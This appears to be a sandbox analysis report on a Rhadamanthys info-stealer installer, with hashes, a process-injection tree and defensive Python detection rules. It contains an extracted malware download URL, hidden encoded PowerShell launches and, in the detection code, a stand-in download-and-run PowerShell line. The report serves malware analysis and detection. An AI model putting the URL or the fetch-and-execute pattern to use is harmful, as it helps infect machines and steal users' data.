Analysis

max time kernel: 538s
max time network: 452s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 27-03-2024 16:03
Static task: static1
Behavioral task: behavioral1  Sample: x32_x64_installer.zip  Resource: win10v2004-20240226-en
Behavioral task: behavioral2  Sample: password.jpg  Resource: win10v2004-20240226-en
Behavioral task: behavioral3  Sample: setup.zip  Resource: win10v2004-20240226-en
General

Target: x32_x64_installer.zip
Size: 7.5MB
MD5: fe483e12016e3ade9e0a3e692dfb1de7
SHA1: 0d65b99ef00c0938802c8f65f232deae7bcfc281
SHA256: 41578e9927574558d723c7680f303e145d0ec2fe7543fbbb2a9ec0bd7d82979d
SHA512: e45f193771bc711fe09c5d2d59ab61f2bf22e38cf6850b7784dcd799845b4550e2097719d271a53d1a8e7a57427817133722fcfb4dc3820ccaa98d408346f753
SSDEEP: 196608:iH+809v9oINYgQfL4ceSl+pQ0qc/Fbqd/NEoZpLyx4U3u:W+/FWISgW3GQBc/FbGExx+
Malware Config
Extracted: https://curlhub.monster/newdrop.bs64

Signatures
Rhadamanthys
Rhadamanthys is an info stealer written in C++, first seen in August 2022.

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes: explorer.exe
description | pid | Process | procid_target
PID 4860 created 2896 | 4860 | explorer.exe | 50

Blocklisted process makes network request 3 IoCs
Processes: powershell.exe, powershell.exe
flow | pid | Process
443 | 1072 | powershell.exe
444 | 1072 | powershell.exe
485 | 2100 | powershell.exe

Executes dropped EXE 2 IoCs
Processes: gpg.exe, svchost.exe
pid | Process
4500 | gpg.exe
2156 | svchost.exe

Loads dropped DLL 27 IoCs
Processes: MsiExec.exe, gpg.exe, MsiExec.exe, MsiExec.exe, MsiExec.exe
pid | Process | events
1376 | MsiExec.exe | 6
4500 | gpg.exe | 6
4056 | MsiExec.exe | 5
1004 | MsiExec.exe | 5
2784 | MsiExec.exe | 5

Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: msiexec.exe (five instances); every event is "File opened (read-only)" on the drive root listed
ioc | Process | events
\??\A: | msiexec.exe | 3
\??\B: | msiexec.exe | 4
\??\E: | msiexec.exe | 3
\??\G: | msiexec.exe | 3
\??\H: | msiexec.exe | 3
\??\I: | msiexec.exe | 3
\??\J: | msiexec.exe | 1
\??\K: | msiexec.exe | 4
\??\L: | msiexec.exe | 1
\??\M: | msiexec.exe | 2
\??\N: | msiexec.exe | 4
\??\O: | msiexec.exe | 3
\??\P: | msiexec.exe | 2
\??\Q: | msiexec.exe | 4
\??\R: | msiexec.exe | 2
\??\S: | msiexec.exe | 3
\??\T: | msiexec.exe | 3
\??\U: | msiexec.exe | 2
\??\V: | msiexec.exe | 3
\??\W: | msiexec.exe | 4
\??\X: | msiexec.exe | 3
\??\Y: | msiexec.exe | 1
\??\Z: | msiexec.exe | 3

Drops file in System32 directory 11 IoCs
Processes: svchost.exe
description | ioc | Process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs | svchost.exe

Suspicious use of SetThreadContext 1 IoCs
Processes: gpg.exe
description | pid | Process | procid_target
PID 4500 set thread context of 4860 | 4500 | gpg.exe | 137

Drops file in Windows directory 32 IoCs
Processes: msiexec.exe
description | ioc | Process
File opened for modification | C:\Windows\Installer\MSID952.tmp | msiexec.exe
File created | C:\Windows\Installer\e59d6e2.msi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI633A.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8935.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID6B0.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID82A.tmp | msiexec.exe
File created | C:\Windows\Installer\e59d6de.msi | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID73C.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID8A4.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID903.tmp | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8A9F.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIEA2D.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID9FF.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI6399.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI88A7.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8B4C.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID77D.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI64D2.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSIDA3E.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI62FA.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8984.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID5F2.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID661.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSID6EF.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\e59d6de.msi | msiexec.exe
File created | C:\Windows\Installer\SourceHash{0A6C4E0B-599B-45A1-852F-9E5AF85901A1} | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI625C.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI62AB.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI89C3.tmp | msiexec.exe

Program crash 3 IoCs
Processes: WerFault.exe, WerFault.exe, WerFault.exe
pid | pid_target | Process | procid_target
4968 | 4860 | WerFault.exe | 137
4856 | 4860 | WerFault.exe | 137
5068 | 4860 | WerFault.exe | 137

Modifies registry class 1 IoCs
Processes: mspaint.exe
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings | mspaint.exe

Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes: mspaint.exe, powershell.exe, msiexec.exe, powershell.exe, explorer.exe, dialer.exe
pid | Process | events
2160 | mspaint.exe | 2
1072 | powershell.exe | 3
4064 | msiexec.exe | 8
2100 | powershell.exe | 5
4860 | explorer.exe | 2
3280 | dialer.exe | 4

Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: OpenWith.exe
pid | Process
4896 | OpenWith.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: msiexec.exe, msiexec.exe, powershell.exe
pid | Process | Token (events)
4208 | msiexec.exe | SeShutdownPrivilege (2), SeIncreaseQuotaPrivilege (2), SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege (31 events in total)
4064 | msiexec.exe | SeSecurityPrivilege (1), SeRestorePrivilege (16), SeTakeOwnershipPrivilege (15) (32 events in total)
1072 | powershell.exe | SeDebugPrivilege (1)

Suspicious use of FindShellTrayWindow 9 IoCs
Processes: msiexec.exe, msiexec.exe, msiexec.exe, msiexec.exe
pid | Process | events
4208 | msiexec.exe | 3
1004 | msiexec.exe | 2
2184 | msiexec.exe | 2
1932 | msiexec.exe | 2

Suspicious use of SetWindowsHookEx 2 IoCs
Processes: mspaint.exe, OpenWith.exe
pid | Process
2160 | mspaint.exe
4896 | OpenWith.exe

Suspicious use of WriteProcessMemory 31 IoCs
Processes: msiexec.exe, MsiExec.exe, gpg.exe, explorer.exe
description | pid | Process | procid_target | events
PID 4064 wrote to memory of 1376 | 4064 | msiexec.exe | 131 | 3
PID 1376 wrote to memory of 1072 | 1376 | MsiExec.exe | 132 | 3
PID 4064 wrote to memory of 4500 | 4064 | msiexec.exe | 134 | 3
PID 4500 wrote to memory of 4860 | 4500 | gpg.exe | 137 | 4
PID 4860 wrote to memory of 2100 | 4860 | explorer.exe | 142 | 2
PID 4860 wrote to memory of 2156 | 4860 | explorer.exe | 145 | 2
PID 4064 wrote to memory of 4056 | 4064 | msiexec.exe | 147 | 3
PID 4860 wrote to memory of 3280 | 4860 | explorer.exe | 148 | 5
PID 4064 wrote to memory of 1004 | 4064 | msiexec.exe | 157 | 3
PID 4064 wrote to memory of 2784 | 4064 | msiexec.exe | 159 | 3

Processes
(indentation shows the parent/child depth recorded by the sandbox)

PID 2896  C:\Windows\system32\sihost.exe  (cmdline: sihost.exe)
  PID 3280  C:\Windows\SysWOW64\dialer.exe  (cmdline: "C:\Windows\system32\dialer.exe")
    - Suspicious behavior: EnumeratesProcesses
PID 4964  C:\Windows\Explorer.exe  (cmdline: C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\x32_x64_installer.zip)
PID 380  C:\Windows\System32\rundll32.exe  (cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding)
PID 2160  C:\Windows\system32\mspaint.exe  (cmdline: "C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\x32_x64_installer\password.jpg" /ForceBootstrapPaint3D)
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
PID 5096  C:\Windows\System32\svchost.exe  (cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc)
  - Drops file in System32 directory
PID 4896  C:\Windows\system32\OpenWith.exe  (cmdline: C:\Windows\system32\OpenWith.exe -Embedding)
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
PID 4208  C:\Windows\System32\msiexec.exe  (cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\Temp1_setup.zip\setup.msi")
  - Enumerates connected drives
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
PID 4064  C:\Windows\system32\msiexec.exe  (cmdline: C:\Windows\system32\msiexec.exe /V)
  - Enumerates connected drives
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID 1376  C:\Windows\syswow64\MsiExec.exe  (cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 214AE9F4CD283C557065F69C378F3A47)
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID 1072  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssDAB9.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiDAB6.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrDAB7.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrDAB8.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue.")
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  PID 4500  C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe  (cmdline: "C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe")
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID 4860  C:\Windows\SysWOW64\explorer.exe  (cmdline: explorer.exe)
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID 2100  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (cmdline: powershell -windowstyle hidden -e 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)
        - Blocklisted process makes network request
        - Suspicious behavior: EnumeratesProcesses
      PID 2156  C:\Users\Admin\AppData\Local\Temp\xKfjBXaCXglJw6E\svchost.exe  (cmdline: "C:\Users\Admin\AppData\Local\Temp\xKfjBXaCXglJw6E\svchost.exe")
        - Executes dropped EXE
      PID 4968  C:\Windows\SysWOW64\WerFault.exe  (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 2176)
        - Program crash
      PID 4856  C:\Windows\SysWOW64\WerFault.exe  (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 2056)
        - Program crash
      PID 5068  C:\Windows\SysWOW64\WerFault.exe  (cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 2200)
        - Program crash
  PID 4056  C:\Windows\syswow64\MsiExec.exe  (cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 1B751952A4EAAF48E6B7444CBFBA2ED9)
    - Loads dropped DLL
  PID 1004  C:\Windows\syswow64\MsiExec.exe  (cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding DE333F3D2EED06DA6DDB3E6CC4D79281)
    - Loads dropped DLL
  PID 2784  C:\Windows\syswow64\MsiExec.exe  (cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0F00D09D91849E4E721713DA63586975)
    - Loads dropped DLL
PID 1004  C:\Windows\System32\msiexec.exe  (cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\dionegro\setup.msi")
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
PID 4180  C:\Windows\SysWOW64\WerFault.exe  (cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4860 -ip 4860)
PID 1932  C:\Windows\SysWOW64\WerFault.exe  (cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4860 -ip 4860)
PID 2484  C:\Windows\SysWOW64\WerFault.exe  (cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4860 -ip 4860)
PID 2184  C:\Windows\System32\msiexec.exe  (cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\dionegro\setup.msi")
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
PID 1932  C:\Windows\System32\msiexec.exe  (cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\dionegro\setup.msi")
  - Enumerates connected drives
  - Suspicious use of FindShellTrayWindow
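Read as one chain, the tree above shows the Windows Installer service (msiexec.exe /V, PID 4064) running a PowerShell custom action with -ExecutionPolicy Bypass, starting gpg.exe from AppData\Roaming, gpg.exe calling SetThreadContext on a freshly spawned 32-bit explorer.exe, and that explorer.exe launching hidden encoded PowerShell, a svchost.exe dropped under Temp, and a dialer.exe that the tree files under sihost.exe while explorer.exe is the process writing to its memory (the NtCreateUserProcessOtherParentProcess signature). The drive enumeration and AdjustPrivilegeToken hits on msiexec.exe are the Installer's normal behaviour for any package and carry no signal on their own. The Python below is an added example written for this page, not sandbox output or vendor tooling: it turns those observations into rules over process-creation events constructed from the tree's PIDs, image paths and command lines, and decodes a powershell -e argument. The creator and ctx_set_by fields are assumptions drawn from the WriteProcessMemory, SetThreadContext and NtCreateUserProcessOtherParentProcess signatures rather than columns the report provides, a ppid of 0 stands for parents the page does not show, and the base64 payload attached to PID 2100 is a constructed stand-in for the redacted one.

```python
"""Rules that fire on the injection chain shown in the process tree above.

Added example for this report; not part of the sandbox output or of any
vendor's tooling. EVENTS is constructed from the PIDs, image paths and
command lines listed in the tree. `creator` and `ctx_set_by` are assumptions
read off the WriteProcessMemory / SetThreadContext /
NtCreateUserProcessOtherParentProcess signatures, ppid 0 marks a parent the
page does not show, and the -e payload for PID 2100 is a constructed stand-in.
"""
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

SYSTEM_DIR = re.compile(r"^c:\\windows\\(system32|syswow64)\\", re.I)
USER_WRITABLE = re.compile(r"\\(appdata|temp|programdata)\\", re.I)
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+(\S+)", re.I)
HIDDEN_FLAGS = re.compile(r"-windowstyle\s+hidden|-executionpolicy\s+bypass", re.I)
# Binaries that only live under C:\Windows on a clean host.
PROTECTED_NAMES = {"svchost.exe", "explorer.exe", "dialer.exe", "msiexec.exe", "sihost.exe"}


@dataclass
class ProcEvent:
    pid: int
    ppid: int      # parent recorded on the process object (what the tree shows)
    creator: int   # process that actually issued the create call (assumed)
    image: str
    cmdline: str
    ctx_set_by: Optional[int] = None  # pid that called SetThreadContext on this process


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the UTF-16LE plaintext behind powershell -e/-enc, or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(events: List[ProcEvent]) -> Dict[int, List[str]]:
    """Map every pid to the rule names that fired on it (empty list if none)."""
    by_pid = {e.pid: e for e in events}
    hits: Dict[int, List[str]] = {e.pid: [] for e in events}
    for e in events:
        name, parent = basename(e.image), by_pid.get(e.ppid)
        # 1. Creator and recorded parent disagree: PPID spoofing through
        #    NtCreateUserProcess with a borrowed parent handle.
        if e.creator != e.ppid:
            hits[e.pid].append("ppid_spoofing")
        # 2. A binary from a user-writable directory rewrote the thread context
        #    of a system binary it spawned: the process-hollowing pattern.
        src = by_pid.get(e.ctx_set_by) if e.ctx_set_by is not None else None
        if src and USER_WRITABLE.search(src.image) and SYSTEM_DIR.match(e.image):
            hits[e.pid].append("process_hollowing")
        # 3. A protected system-binary name running from outside C:\Windows.
        if name in PROTECTED_NAMES and not e.image.lower().startswith("c:\\windows\\"):
            hits[e.pid].append("masquerading_path")
        # 4. Windows Installer starting an executable from a user-writable path.
        if parent and basename(parent.image) == "msiexec.exe" and USER_WRITABLE.search(e.image):
            hits[e.pid].append("installer_launched_dropped_exe")
        # 5. PowerShell with encoded/hidden/bypass switches, qualified by its launcher.
        if name == "powershell.exe":
            if ENCODED_FLAG.search(e.cmdline):
                hits[e.pid].append("powershell_encoded")
            if HIDDEN_FLAGS.search(e.cmdline):
                hits[e.pid].append("powershell_hidden_or_bypass")
            if parent and basename(parent.image) == "msiexec.exe":
                hits[e.pid].append("powershell_from_installer_custom_action")
            if parent and parent.ctx_set_by is not None:
                hits[e.pid].append("powershell_from_hollowed_host")
    return hits


# Constructed stand-in for the redacted -e payload of PID 2100 (not from the page).
CONSTRUCTED_STAGE = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"
_B64 = base64.b64encode(CONSTRUCTED_STAGE.encode("utf-16-le")).decode()

EVENTS = [
    ProcEvent(2896, 0, 0, r"C:\Windows\system32\sihost.exe", "sihost.exe"),
    ProcEvent(3280, 2896, 4860, r"C:\Windows\SysWOW64\dialer.exe", r'"C:\Windows\system32\dialer.exe"'),
    ProcEvent(4064, 0, 0, r"C:\Windows\system32\msiexec.exe", r"C:\Windows\system32\msiexec.exe /V"),
    ProcEvent(1376, 4064, 4064, r"C:\Windows\syswow64\MsiExec.exe",
              r"C:\Windows\syswow64\MsiExec.exe -Embedding 214AE9F4CD283C557065F69C378F3A47"),
    ProcEvent(1072, 1376, 1376, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssDAB9.ps1"'),
    ProcEvent(4500, 4064, 4064, r"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe",
              r'"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"'),
    ProcEvent(4860, 4500, 4500, r"C:\Windows\SysWOW64\explorer.exe", "explorer.exe", ctx_set_by=4500),
    ProcEvent(2100, 4860, 4860, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell -windowstyle hidden -e {_B64}"),
    ProcEvent(2156, 4860, 4860, r"C:\Users\Admin\AppData\Local\Temp\xKfjBXaCXglJw6E\svchost.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\xKfjBXaCXglJw6E\svchost.exe"'),
]

if __name__ == "__main__":
    for pid, rules in analyse(EVENTS).items():
        if rules:
            print(f"{pid:>5}  {', '.join(rules)}")
    print("decoded -e payload:", decode_encoded_command(EVENTS[7].cmdline))
```

Run as a script it prints the rules that fire per PID. Fed from real telemetry, rule 1 needs a source that exposes the creating process (an EDR call-stack or kernel callback view), because the ParentProcessId in Sysmon event ID 1 is the field PPID spoofing falsifies; rules 3 to 5 work from ordinary process-creation logs alone.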
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 18KB
MD5: d178d65fab62e109b9297ffe481924d0
SHA1: e8d77c1f8159fec32502744383e2ccdd9eb00041
SHA256: 6f71db2358e917554552dc1eda451a37afa26b401617be4b8faea4a61249ad26
SHA512: 81d66a1a3deca273a0fb9851c4cd4586d6388f628d56f483e4753c13922a8ed498c5930eecc48ea128fc20a6131639f5edd61ecd854439aeb9e9b73e2902f9f6

Filesize: 3KB
MD5: b875ceae19b80e8ec3e6c92509595d8b
SHA1: 3fec9e1c06fbf046f9c77adabfb8066604f46c95
SHA256: 3c20193a0f2a5873e79cdea6bef6cb2940849336019cd45a902f52a7ae35e0e0
SHA512: 23651e7c645065b7c94c67cbe845347a0e8e3c82ac09be31c44d69d335b4ad12e45ffec5c3041dc8216b060a798065047b275c1eca34117ecc36722a5592d1ce

Filesize: 3KB
MD5: 089b2892de707d97266679cb8605ac46
SHA1: 7669e0a4d522059a4a55f33a65a767cda8307217
SHA256: 545ab7b7ac37eb01c11fc7ff30c35156fc217d0566318535972c318e2fe71c02
SHA512: 99ce25b570da01a12a7418d849ae795373017e1b8c112659d657ec84e12f738fa5e60861affeccb927024551a3b801a0267999def4f39e18630050eecd434099

Filesize: 3KB
MD5: 61a47a3c255928cc7b27fc678993648b
SHA1: 2f7af2b373870b16e0907934a7ee84f27c99535e
SHA256: 0e4d5b95ff605db334ca7c4cee4634490e7219c3c3c0480835765cf0e5a773a0
SHA512: ea28e2a7d020f4fe232b37848399a1c2c0cb486eb39bf92b9a75ad67001a36b14b17cc940ba314fbed6f6e81ef157faaf5ebd4454fa1dd3acf27e4d659cf173d

Filesize: 18KB
MD5: a2c1d2cfc324253fe48c917f3a3b37bf
SHA1: 84d6a497073050df2d8482b557135aacd8649284
SHA256: 75236f965ddb47c26329ac89d4459e2d8f013f3e6e2b73bf02f7405232f6b5db
SHA512: 238b32897c17bf8cfc58640e3f4a26c689a757e4d9d6f41e083f41100b785a6918252876a12d62d24c8a5bd25ca090c92682072b0764ff68a7e7a95fc7f4c524

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 60B
MD5: eb0046beb949b23b97dccd59c4b8f131
SHA1: c084a9c15a323cd51d24122681a494e52577487f
SHA256: b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467
SHA512: 8dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0

Filesize: 6KB
MD5: 30c30ef2cb47e35101d13402b5661179
SHA1: 25696b2aab86a9233f19017539e2dd83b2f75d4e
SHA256: 53094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512: 882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458

Filesize: 542B
MD5: 753240f3d0c58563dcba1244db69b0d7
SHA1: 4a0f248fccc2431ece50f717cbf80f6681504932
SHA256: e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a
SHA512: 03987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9

Filesize: 1.6MB
MD5: a9c5924063a253f64fb86bc924be6996
SHA1: c39ba1e011318b3edf295d4bdde3d56b5de89972
SHA256: eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4
SHA512: 57f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e

Filesize: 1.3MB
MD5: 35365d3713500bde4e2e1422c54f04fa
SHA1: 0b24b1de060caa7be51404d82da5fef05958a1da
SHA256: 5f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19
SHA512: 3e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375

Filesize: 154KB
MD5: a2dd12a8ecef27ca0e524e9bb4bdb8f5
SHA1: a4f5718c8bc1cc1fba49332d767ad296f7156dbc
SHA256: e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada
SHA512: b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c

Filesize: 576KB
MD5: f87ae9852d35b780aeedde438c892b33
SHA1: 1e619647f3153d42852ee4692402ea7482a4b0d0
SHA256: f8c672bb71967f5792b62135caad7a5dc7b1c5fc2a7b4875d37e646014a9c65d
SHA512: 6ec3ec5160bbb96ed7743c4a965f5c98edd51ee0bf42d08ce10902eb75db14e0a3ab09e2175580fd0cea0425e30e000e320d4d4ff0b9a90141efe5fe8c166227

Filesize: 540KB
MD5: f6e0a5fd71de78ba3d635e59fa0b5471
SHA1: 8ffe9980af53668c08a07ff7de1e7dee0749d6a4
SHA256: 1515801cee7233cb07b7a411586797b68721bdfa1ecbc5a6b9e137045d080e50
SHA512: c055654cf580fff3cbd715eee93cd0d2546dffbb338e607795e52286329e661c952c6a8cd52b5a44136cd8cb2fd2be2d98f2fad437432bb915f5fbdd11841a20

Filesize: 245KB
MD5: 72498f59c8c580707a0a3839c332f51b
SHA1: fb09b912912610d243066cc8b71435f689e6a449
SHA256: 51b69b17a15a4c8df35e81b9eef8b3c8eb914e8208f0ebbe9713661583cddf4d
SHA512: 116956f25484e01236e5aaac2693e78dbc98e47580ac535a49582e21d69602be23f53f45945b0e94b2b0cf2825832a3e1c1f647302bd7b8398794f5579a0e022

Filesize: 40KB
MD5: b7b148054a2818699d93f96139b4d0d0
SHA1: 0a5187b37bd84c19a7d2d84f328fa0adbc75123c
SHA256: 25fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915
SHA512: 4f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1

Filesize: 768KB
MD5: 50ce7d881dd88eb9728fa9225f3fa938
SHA1: 616242e243fe334fd997832fd002f331fb1949be
SHA256: cc2b0805db0ef162c8aadfa2e9611507c994edd2394a618dd9c938cfb902c9e7
SHA512: eca00bd0a5c31d862a681c5219cac9d2c6e2193a39d11dbc2a3c5002c63965e4e65d08bda26c042176bc1074887beb86a65f3b795aa0a89e124dad14e1d00033

Filesize: 422KB
MD5: b9d7a09c63378aea52a04c42d9893a6e
SHA1: 8d10526730d5be4f6adfccf370546cfdde9af7b1
SHA256: 0930ceebc768d160e1d4c857c3f4113e8b3ebcb5bdce4a5232471c90effe8158
